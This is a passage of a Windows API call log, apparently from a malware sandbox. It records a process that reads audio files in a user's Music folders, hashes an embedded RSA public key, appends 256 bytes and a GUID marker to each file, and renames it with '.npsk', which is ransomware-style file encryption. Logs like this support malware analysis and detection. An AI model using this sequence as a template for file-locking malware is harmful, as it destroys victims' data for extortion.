[0217.525] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.525] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.525] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.525] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b2018) returned 1 [0217.526] CryptCreateHash (in: hProv=0x7b2018, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.526] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.526] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.526] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.526] GetLastError () returned 0x0 [0217.527] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.527] CryptReleaseContext (hProv=0x7b2018, dwFlags=0x0) returned 1 [0217.527] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.527] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.527] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.527] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.528] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x10a37, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.528] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.528] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.528] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.528] CloseHandle (hObject=0x61c) returned 1 [0217.543] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\31nXcZ37 9zWspLRsh\\p1Alcjoai8WuJl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\31nxcz37 9zwsplrsh\\p1alcjoai8wujl.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\31nXcZ37 9zWspLRsh\\p1Alcjoai8WuJl.mp3.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\31nxcz37 9zwsplrsh\\p1alcjoai8wujl.mp3.npsk")) returned 1 [0217.545] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ccc32a0, ftCreationTime.dwHighDateTime=0x1d5e74a, ftLastAccessTime.dwLowDateTime=0xdb667590, ftLastAccessTime.dwHighDateTime=0x1d5df15, ftLastWriteTime.dwLowDateTime=0xdb667590, ftLastWriteTime.dwHighDateTime=0x1d5df15, nFileSizeHigh=0x0, nFileSizeLow=0x111fd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qs7WTw_TT.wav", cAlternateFileName="QS7WTW~1.WAV")) returned 1 [0217.545] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\31nXcZ37 9zWspLRsh\\qs7WTw_TT.wav") returned=".wav" [0217.545] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\31nXcZ37 9zWspLRsh\\qs7WTw_TT.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\31nxcz37 9zwsplrsh\\qs7wtw_tt.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.546] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=70141) returned 1 [0217.546] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.548] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x111d7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.548] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.550] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x111fd, lpOverlapped=0x0) returned 1 [0217.550] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.551] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.551] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.551] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b2018) returned 1 [0217.552] CryptCreateHash (in: hProv=0x7b2018, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.552] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.552] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.552] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.552] GetLastError () returned 0x0 [0217.552] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.552] CryptReleaseContext (hProv=0x7b2018, dwFlags=0x0) returned 1 [0217.552] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.552] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.552] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.552] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.553] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x111fd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.553] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.553] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.553] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.553] CloseHandle (hObject=0x61c) returned 1 [0217.559] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\31nXcZ37 9zWspLRsh\\qs7WTw_TT.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\31nxcz37 9zwsplrsh\\qs7wtw_tt.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\31nXcZ37 9zWspLRsh\\qs7WTw_TT.wav.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\31nxcz37 9zwsplrsh\\qs7wtw_tt.wav.npsk")) returned 1 [0217.562] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80dbc650, ftCreationTime.dwHighDateTime=0x1d5df67, ftLastAccessTime.dwLowDateTime=0xbcaf2390, ftLastAccessTime.dwHighDateTime=0x1d5e3e8, ftLastWriteTime.dwLowDateTime=0xbcaf2390, ftLastWriteTime.dwHighDateTime=0x1d5e3e8, nFileSizeHigh=0x0, nFileSizeLow=0x7f71, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yJ2DuGZU1ek703MBkqDp.wav", cAlternateFileName="YJ2DUG~1.WAV")) returned 1 [0217.562] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\31nXcZ37 9zWspLRsh\\yJ2DuGZU1ek703MBkqDp.wav") returned=".wav" [0217.562] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\31nXcZ37 9zWspLRsh\\yJ2DuGZU1ek703MBkqDp.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\31nxcz37 9zwsplrsh\\yj2dugzu1ek703mbkqdp.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.563] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=32625) returned 1 [0217.563] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.565] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x7f4b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.565] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.567] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x7f71, lpOverlapped=0x0) returned 1 [0217.567] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.568] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.568] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.568] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b2018) returned 1 [0217.569] CryptCreateHash (in: hProv=0x7b2018, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.569] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.569] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.569] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.569] GetLastError () returned 0x0 [0217.569] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.569] CryptReleaseContext (hProv=0x7b2018, dwFlags=0x0) returned 1 [0217.569] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.569] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.569] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.569] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.570] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x7f71, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.570] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.570] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.570] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.570] CloseHandle (hObject=0x61c) returned 1 [0217.572] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\31nXcZ37 9zWspLRsh\\yJ2DuGZU1ek703MBkqDp.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\31nxcz37 9zwsplrsh\\yj2dugzu1ek703mbkqdp.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\31nXcZ37 9zWspLRsh\\yJ2DuGZU1ek703MBkqDp.wav.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\31nxcz37 9zwsplrsh\\yj2dugzu1ek703mbkqdp.wav.npsk")) returned 1 [0217.573] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80dbc650, ftCreationTime.dwHighDateTime=0x1d5df67, ftLastAccessTime.dwLowDateTime=0xbcaf2390, ftLastAccessTime.dwHighDateTime=0x1d5e3e8, ftLastWriteTime.dwLowDateTime=0xbcaf2390, ftLastWriteTime.dwHighDateTime=0x1d5e3e8, nFileSizeHigh=0x0, nFileSizeLow=0x7f71, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yJ2DuGZU1ek703MBkqDp.wav", cAlternateFileName="YJ2DUG~1.WAV")) returned 0 [0217.573] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.573] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.573] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.574] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\") returned="tP3BeQ_6ct\\" [0217.574] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\") returned="sg3CqdHoD\\" [0217.574] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\") returned="tCN4\\" [0217.574] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0217.574] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.574] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.574] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.574] PathFindFileNameW (pszPath="") returned="" [0217.574] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6b9bea0, ftCreationTime.dwHighDateTime=0x1d5de1e, ftLastAccessTime.dwLowDateTime=0xd9d16370, ftLastAccessTime.dwHighDateTime=0x1d5de61, ftLastWriteTime.dwLowDateTime=0xd9d16370, ftLastWriteTime.dwHighDateTime=0x1d5de61, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.577] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6b9bea0, ftCreationTime.dwHighDateTime=0x1d5de1e, ftLastAccessTime.dwLowDateTime=0xd9d16370, ftLastAccessTime.dwHighDateTime=0x1d5de61, ftLastWriteTime.dwLowDateTime=0xd9d16370, ftLastWriteTime.dwHighDateTime=0x1d5de61, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.577] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a6b19e0, ftCreationTime.dwHighDateTime=0x1d5e563, ftLastAccessTime.dwLowDateTime=0x305fc010, ftLastAccessTime.dwHighDateTime=0x1d5dc55, ftLastWriteTime.dwLowDateTime=0x305fc010, ftLastWriteTime.dwHighDateTime=0x1d5dc55, nFileSizeHigh=0x0, nFileSizeLow=0x12e16, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="c00aIiYACJ.wav", cAlternateFileName="C00AII~1.WAV")) returned 1 [0217.577] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\c00aIiYACJ.wav") returned=".wav" [0217.577] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\c00aIiYACJ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\tp3beq_6ct\\c00aiiyacj.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.580] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=77334) returned 1 [0217.581] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.582] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x12df0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.582] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.584] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x12e16, lpOverlapped=0x0) returned 1 [0217.586] lstrlenA (lpString="-----BEGIN PUBLIC 